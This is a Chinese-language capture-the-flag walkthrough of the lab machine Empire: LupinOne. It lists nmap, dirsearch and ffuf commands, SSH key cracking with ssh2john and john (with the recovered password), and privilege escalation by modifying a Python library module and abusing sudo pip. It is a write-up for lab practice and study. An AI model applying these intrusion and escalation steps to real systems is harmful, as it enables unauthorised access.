EMPIRE: LUPINONE

攻击机：192.168.223.128        

目标机：192.168.223.141

主机发现

nmap -sP 192.168.222.0/24

端口扫描

nmap -p- 192.168.223.141

开启了22和80端口。

看一下web界面

只有一张图片

看一下源码

没有什么有用信息

看一下robots.txt

去~myfiles看看

看一下源码

又让我别give up,keep trying

目录扫描一下看看

dirsearch -u 192.168.223.141

也没什么鸟东西,fuzz一下~后面的东西试试

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.223.141/~FUZZ'

有个secret去看看

wtf,果然在这，意思让我们在这里找到ssh的私钥，有一个隐藏文件，还有fasttrack这个字典，以及icex64的用户名。

先找隐藏文件，继续爆破目录

ffuf -u "http://192.168.223.141/~secret/.FUZZ" -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub,.html,.bak -mc 200 

有个mysecret的目录很有说法

base家族的

是个base58加密

保存为ssh.key

用ssh2john将key转换成hash

用john破解，字典用fasttrack

密码是P@55w0rd!

ssh连接一下

ssh [email protected] -i ssh.key

权限太高了，降低一下权限
 

chmod 600 ssh.key

ssh [email protected] -i ssh.key

拿到shell

有个user.txt文件

没什么用，看看怎么提权

先看一下有没有特殊文件

有个不要密码的python文件，看一下

发现不可编辑

看看这个webbrowser模块可不可以修改

先找到这个模块

find / -type f -name webbrowser.py 2>/dev/null

vi修改一下加上这个语句

然后用arsene执行

sudo -u arsene python3.9 /home/arsene/heist.py

拿到了arsene的shell

看看有没有可利用的文件

pip指令免密root，可以用来提权

拿到root权限

总结：1.robots.txt2.目录fuzz3.ssh私钥爆破，先转john再john爆破4.py

模块修改获取shell5.pip提权